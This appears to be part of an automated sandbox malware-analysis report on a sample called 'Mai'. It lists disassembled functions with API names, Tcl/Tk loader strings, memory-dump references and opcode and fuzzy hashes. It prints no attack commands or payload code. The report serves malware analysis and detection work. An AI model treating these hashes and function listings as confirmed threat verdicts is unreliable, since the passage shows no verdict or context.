                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                            • Instruction ID: 527e363646b437cc9848cc8623d7a8991a578e5f01e5459af285351883174a20
                                                            • Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                            • Instruction Fuzzy Hash: E4E08C60F083C662FF18BBB6984607D11509F88B41F4044B6D80EC6292FE3C68A962C0
                                                            Function 00007FF6DD6686A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                            • Instruction ID: dd938fd1c8bf569e9223dc0f1b42824d71cd8e60b3f5dbd63990a0147e58c19d
                                                            • Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                            • Instruction Fuzzy Hash: A0D01210F5A587A1EA14377A0C4503D12906F44721F9006B2C13DC11F1FE6CB87529E1
                                                            Function 00007FF6DD667E24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                            • Instruction ID: 60c36e4ada5c1fd43f2ca60468e6a5b4ccbeca8cf66b0e06a307779b94239a08
                                                            • Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                            • Instruction Fuzzy Hash: 0CD0C910F19583A1E6143775188A03D11906F44731F5006B2C029C05E0FE2CACA935D1
                                                            Function 00007FF6DD657D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                            • _findclose.LIBCMT ref: 00007FF6DD657F99
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_findclose
                                                            • String ID:
                                                            • API String ID: 2772937645-0
                                                            • Opcode ID: a8eec92fcd3b15b2131d1e03c4232d75d862536ce56818bce2d995f04c6387b6
                                                            • Instruction ID: 0381f5e01a2702987ff7e73bece68a0aaabb8681b88d565393e4c1cc1e064b5a
                                                            • Opcode Fuzzy Hash: a8eec92fcd3b15b2131d1e03c4232d75d862536ce56818bce2d995f04c6387b6
                                                            • Instruction Fuzzy Hash: E171AD52E18AC581EA11DB2CD5052FD6360F7A9B4CF54E322DB9C52593FF28E2E9C780
                                                            Function 00007FF6DD66C46C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                            • Instruction ID: c2222dee19516ce26c038cf54b3f3fd271e8e7c4c68a0f68ba4b05145d8a1864
                                                            • Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                            • Instruction Fuzzy Hash: AC41D472D08A8187EA34FB29E94017D7BA0EB55B85F110173E68EC3691EF2DE422D7D0
                                                            Function 00007FF6DD6582B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock
                                                            • String ID:
                                                            • API String ID: 840049012-0
                                                            • Opcode ID: 295a09af8828371d6b51f996ef1a7ffb8e58ba036dc716bafaccf3d30419a292
                                                            • Instruction ID: 6330f83f6d415fa774c2c296194dd228c6b6bd9dada3922fb44b6cdd9a7664a4
                                                            • Opcode Fuzzy Hash: 295a09af8828371d6b51f996ef1a7ffb8e58ba036dc716bafaccf3d30419a292
                                                            • Instruction Fuzzy Hash: 5321A221F086D245FB10BA52A4043BEA751BF45BD4FC85432EE0D87B87EE3CE0919680
                                                            Function 00007FF6DD66BEFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                            • Instruction ID: c68a10be145172cc1d1168da1aa8e6d05b5ee9554ed10be1898f72067d4874a8
                                                            • Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                            • Instruction Fuzzy Hash: 4F319E32E1868286F751BB69884137C2650AF80BA1F4101B7EA5D873E2FF7CF461A7D1
                                                            Function 00007FF6DD669EF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                            • Instruction ID: f76cb6dda9627cdfbd415061ae1f4f9fd0886450fc55827ea1924729fc5c0655
                                                            • Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                            • Instruction Fuzzy Hash: 1A217C32E047858AEB24AF74C4442EC33A4EB4471CF55463BEA1C86AC9EF38D5A4DBC0
                                                            Function 00007FF6DD6664A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction ID: 4aedbdfe3f4840faf131842ce4bf53678c2bbe80cb583fd63ef57ac1813a6e36
                                                            • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction Fuzzy Hash: 92115421E1C6C181EA60BF51A40127DA264FF85B84F1444B2EB8DD7A86FF7DE461A7C0
                                                            Function 00007FF6DD676CAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                            • Instruction ID: fffdad336c4695b10f1e946954e95ac814f48ac7ca565e2e43ffbf54ff68b433
                                                            • Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                            • Instruction Fuzzy Hash: EB21F532E18AC596DB61AF18E44037D73A0EB84B94F140236EB5D87AD9EF3CD4249B40
                                                            Function 00007FF6DD6604FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                            • Instruction ID: 4c9378eb5d731138d47a9aa9230d467d87fb6589fdba121d4c382e2de1785a0b
                                                            • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                            • Instruction Fuzzy Hash: 3C01A531E087C141EB04EB56590106DA695BF86FE0F088672DE5C97BD6FE3CE4216380
                                                            Function 00007FF6DD66F158 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6DD66B9A6,?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02), ref: 00007FF6DD66F1AD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                            • Instruction ID: 2d789996dea538ec8d18f01b4a17c4b9408815592a989b868f9158c42406d01e
                                                            • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                            • Instruction Fuzzy Hash: 76F06D65F0928691FE547771D9112BD82A15F88BC0F4C4473CD0EC63C2FE1CE4A8A2D0
                                                            Function 00007FF6DD66DBBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6DD660D24,?,?,?,00007FF6DD662236,?,?,?,?,?,00007FF6DD663829), ref: 00007FF6DD66DBFA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                            • Instruction ID: 94d13e19f79453ed7a9a4d67dff89b14a035e130de655bce4501a181f455e35f
                                                            • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                            • Instruction Fuzzy Hash: B6F05E50F0C2CA51FE547661980127D11949F48BB0F0806B2D82EC62C1FE5CB4A0B9D0
                                                            Function 00007FF6DD6583E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                            • Instruction ID: fbb3bc7a4ee49d0fdde2af07d1e1862442e7ec43207bce7adeaba7016877b1d6
                                                            • Opcode Fuzzy Hash: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                            • Instruction Fuzzy Hash: AB418516D1C6C581EB51AB28D5012FD6360FBA9744F94A233DF8D82593FF28E6E8D380

                                                            Non-executed Functions

                                                            Function 00007FF6DD656EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                            • API String ID: 190572456-2208601799
                                                            • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                            • Instruction ID: e3d8a1f1d2f774e5a18ed3f278fc7039427592b169febe52e8571f85004dbc13
                                                            • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                            • Instruction Fuzzy Hash: 72E1C764E0DBC7F0FA14AB48EC441BC63A1AF05750F945537C80E86AA5FF7CB5A8E690
                                                            Function 00007FF6DD651F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                            • API String ID: 2446303242-1601438679
                                                            • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                            • Instruction ID: 96267e7a39ed37b2c8fa5717543ade4aa3fec7591f7e3bd4dd0541934abc3194
                                                            • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                            • Instruction Fuzzy Hash: 51A19A36A08BC9A7E7149F25E44479EB360F788B84F504126DB9D43B28DF3DE5A4CB80
                                                            Function 00007FF6DD65C57C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                            • Instruction ID: ef3a796389383baf237a3251468b9fcf8a113fcdcda429237b4c53dbf1e07d3e
                                                            • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
